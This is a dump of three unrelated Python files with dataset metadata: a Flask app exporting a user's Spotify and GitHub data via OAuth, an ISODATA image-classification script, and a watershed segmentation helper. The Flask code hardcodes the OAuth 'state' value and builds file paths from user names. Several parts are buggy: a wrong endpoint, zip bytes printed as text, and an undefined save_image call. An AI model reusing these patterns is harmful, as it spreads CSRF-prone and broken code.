scopes = " ".join(scopes)
if not "spotify_token" in session.keys():
return redirect(f"https://accounts.spotify.com/authorize?response_type=code&client_id={client_id}&scope={scopes}&redirect_uri=https://datapak.coolcodersj.repl.co/spotify/callback")
else:
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if artists.text == "":
artists = {"None": "None"}
else:
if "message" in artists.json() and artists.json()['message'] == "The access token expired":
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
artists = artists.json()['artists']['items']
albums = []
album_req = requests.get("https://api.spotify.com/v1/me/albums", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
while "next" in album_req.json() and album_req.json()['next'] != None:
album_req = requests.get(album_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
playlists = []
playlist_req = requests.get("https://api.spotify.com/v1/me/playlists", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
while "next" in playlist_req.json() and playlist_req.json()['next'] != None:
playlist_req = requests.get(playlist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
liked_songs = []
track_req = requests.get("https://api.spotify.com/v1/me/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
liked_episodes = []
episode_req = requests.get("https://api.spotify.com/v1/me/episodes", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
while "next" in episode_req.json() and episode_req.json()['next'] != None:
episode_req = requests.get(episode_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
shows = []
show_req = requests.get("https://api.spotify.com/v1/me/shows", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
while "next" in show_req.json() and show_req.json()['next'] != None:
show_req = requests.get(show_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
top_tracks = []
track_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
top_artists = []
artist_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
while "next" in artist_req.json() and artist_req.json()['next'] != None:
artist_req = requests.get(artist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
current_playback = requests.get("https://api.spotify.com/v1/me/player", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if current_playback.text == '':
current_playback = {"error": "Nothing was playing while backing up."}
else:
current_playback = current_playback.json()
devices = requests.get("https://api.spotify.com/v1/me/player/devices", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if devices.text == '':
devices = {"error": "No devices available."}
else:
devices = devices.json()
recently_played = []
req = requests.get("https://api.spotify.com/v1/me/player/recently-played", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
while "next" in req.json() and req.json()['next'] != None:
req = requests.get(req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
profile = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
username = profile.json()['display_name']
os.mkdir(f"DataPak{username}/")
f = open(f"DataPak{username}/library.json", "w")
print({"artists": artists, "albums": albums, "playlists": playlists, "liked_songs": liked_songs, "liked_episodes": liked_episodes, "shows": shows, "top_tracks": top_tracks, "top_artists": top_artists}, file=f)
f.close()
f = open(f"DataPak{username}/playback.json", "w")
print({"current_playback": current_playback, "devices": devices, "recently_played": recently_played}, file=f)
f.close()
f = open(f"DataPak{username}/profile.json", "w")
print(profile.json(), file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/callback')
def spotcallback():
code = request.args.get("code")
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "authorization_code",
"type": "authorization_code",
"code": code,
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
session['spotify_refresh_token'] = r.json()['refresh_token']
return redirect('/')
@app.route('/github/info')
def ghinfo():
return render_template("ghinfo.html")
@app.route('/github')
def github():
if not "gh_token" in session:
state = "irajfvnqehrtdfwbejktrbnvfbiwkjetrnfgcwkjenrsflwejkbtnfjbrethvbw3urskejg"
session['state'] = state
return redirect(f"https://github.com/login/oauth/authorize?state={state}&client_id={os.environ['GITHUB_CLIENT_ID']}&scope=repo read:repo_hook read:org read:public_key gist user read:discussion read:packages read:gpg_key&redirect_uri=https://DataPak.coolcodersj.repl.co/github/callback")
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
account = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/followers", headers={
"Authorization": f"token {session['gh_token']}"
})
followers = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/following", headers={
"Authorization": f"token {session['gh_token']}"
})
following = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/gists", headers={
"Authorization": f"token {session['gh_token']}"
})
gists = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/starred", headers={
"Authorization": f"token {session['gh_token']}"
})
starred = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/subscriptions", headers={
"Authorization": f"token {session['gh_token']}"
})
watchlist = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/orgs", headers={
"Authorization": f"token {session['gh_token']}"
})
organizations = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/repo", headers={
"Authorization": f"token {session['gh_token']}"
})
repos = r.json()
os.mkdir(f"DataPak{account['login']}/")
print(account, file=open(f"DataPak{account['login']}/account.json", "w"))
print(followers, file=open(f"DataPak{account['login']}/followers.json", "w"))
print(following, file=open(f"DataPak{account['login']}/following.json", "w"))
print(gists, file=open(f"DataPak{account['login']}/gists.json", "w"))
print(starred, file=open(f"DataPak{account['login']}/starred.json", "w"))
print(watchlist, file=open(f"DataPak{account['login']}/watchlist.json", "w"))
print(organizations, file=open(f"DataPak{account['login']}/orgs.json", "w"))
print(repos, file=open(f"DataPak{account['login']}/repos.json", "w"))
username = account['login']
for repo in repos:
name = repo['name']
branch = repo['default_branch']
r = requests.get(f'https://github.com/{username}/{name}/archive/refs/heads/{branch}.zip')
f = open(f'DataPak{username}/{name}.zip', "w+")
print(r.content, file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/github/callback')
def authorized():
code = request.args.get("code")
r = requests.post("https://github.com/login/oauth/access_token", data={
"client_id": os.environ['GITHUB_CLIENT_ID'],
"client_secret": os.environ['GITHUB_CLIENT_SECRET'],
"code": code,
"state": session['state']
},
headers={
"Accept": "application/json"
})
session['gh_token'] = r.json()['access_token']
return redirect("/")
app.run(host="0.0.0.0", port=8080) | CoolCoderSJ/DataPak | main.py | main.py | py | 17,220 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_session.Session",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"l... |
33171162837 | import matplotlib.pyplot as plt
import cv2
import numpy as np
# from pyradar.classifiers.isodata import isodata_classification
from isodataclassifier import isodata_classification
def equalize_histogram(img, histogram, cfs):
"""
Equalize pixel values to [0:255].
"""
total_pixels = img.size
N, M = img.shape
min_value = img.min()
L = 256 # Number of levels of grey
cfs_min = cfs.min()
img_corrected = np.zeros_like(img)
corrected_values = np.zeros_like(histogram)
divisor = np.float32(total_pixels) - np.float32(cfs_min)
if not divisor: # this happens when the image has all the values equals
divisor = 1.0
factor = (np.float32(L) - 1.0) / divisor
corrected_values = ((np.float32(cfs) -
np.float32(cfs_min)) * factor).round()
img_copy = np.uint64(img - min_value)
img_corrected = corrected_values[img_copy]
return img_corrected
def equalization_using_histogram(img):
# Create histogram, bin edges and cumulative distributed function
max_value = img.max()
min_value = img.min()
assert min_value >= 0, \
"ERROR: equalization_using_histogram() img have negative values!"
start, stop, step = int(min_value), int(max_value + 2), 1
histogram, bin_edge = np.histogram(img, xrange(start, stop, step))
cfs = histogram.cumsum() # cumulative frencuency table
img_corrected = equalize_histogram(img, histogram, cfs)
return img_corrected
params = {"K": 100, "I" : 1000, "P" : 10, "THETA_M" : 10, "THETA_S" : 0.01,"THETA_C" : 8, "THETA_O" : 0.02}
img = cv2.imread('dataset/original/before.jpg',0)
# kernel = np.ones((5,5),np.uint8)
plt.imshow(img)
plt.show()
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('Before')
img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print('Operated Image')
#plt.imshow(img)
#plt.show()
# img = cv2.imread('dataset/after.jpg',0)
# # kernel = np.ones((5,5),np.uint8)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('After')
# img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
# img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print("After Operated Image")
# imgplot = plt.imshow(img)
# plt.show()
# run Isodata
class_image = isodata_classification(img, parameters=params)
# plt.imshow(class_image);
# plt.show()
# # equalize class image to 0:255
class_image_eq = equalization_using_histogram(class_image)
# # save it
save_image(IMG_DEST_DIR, "image_eq", image_eq)
# print("Equalized image classified using histogram 1")
# imgplot = plt.imshow(class_image_eq)
# plt.show()
# # also save original image
# image_eq = equalization_using_histogram(image)
# # save it
# print("Equalized image classified using histogram 2")
# #imgplot = plt.imshow(image_eq)
# #plt.show()
| sauravkarn541/morphological_operators | isodata.py | isodata.py | py | 2,932 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros_like",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros_like",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"... |
3715520265 | import cv2
import numpy as np
def get_crops(img, annotations, padding=0):
crops = []
new_img = img.copy() # Prevent drawing on original image
for a in annotations:
c = a['coordinates']
y1, y2 = int(c['y'] - c['height'] / 2 - padding), int(c['y'] + c['height'] / 2 + padding)
x1, x2 = int(c['x'] - c['width'] / 2 - padding), int(c['x'] + c['width'] / 2 + padding)
crop = new_img[y1: y2, x1:x2]
crops.append(crop)
return crops
def segment(crops):
segs = []
for c in crops:
gray = cv2.cvtColor(c, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
# noise removal
kernel = np.ones((3,3),np.uint8)
opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN,kernel, iterations = 4)
# sure background area
sure_bg = cv2.dilate(opening,kernel, iterations=3)
# Finding sure foreground area
dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)
# Finding unknown region
sure_fg = np.uint8(sure_fg)
unknown = cv2.subtract(sure_bg,sure_fg)
# Marker labelling
ret, markers = cv2.connectedComponents(sure_fg)
# Add one to all labels so that sure background is not 0, but 1
markers = markers+1
# Now, mark the region of unknown with zero
markers[unknown==255] = 0
markers = cv2.watershed(c, markers)
markers[:,[0,-1]] = markers[[0,-1]] = 1
c[markers != 1] = [255,191,0]
segs.append(c)
return segs
def draw(img, annotations, segs, padding=0):
overlay = img.copy()
for i in range(len(annotations)):
a = annotations[i]
c = a['coordinates']
y1, y2 = int(c['y'] - c['height'] / 2 - padding), int(c['y'] + c['height'] / 2 + padding)
x1, x2 = int(c['x'] - c['width'] / 2 - padding), int(c['x'] + c['width'] / 2 + padding)
overlay[y1: y2, x1:x2] = segs[i]
alpha = 0.5
cv2.addWeighted(overlay, alpha, img, 1 - alpha,0, img)
return img
| mattzh72/sframe-visualizer | tools/utils/segment.py | segment.py | py | 1,936 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.cvtColor",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY_... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.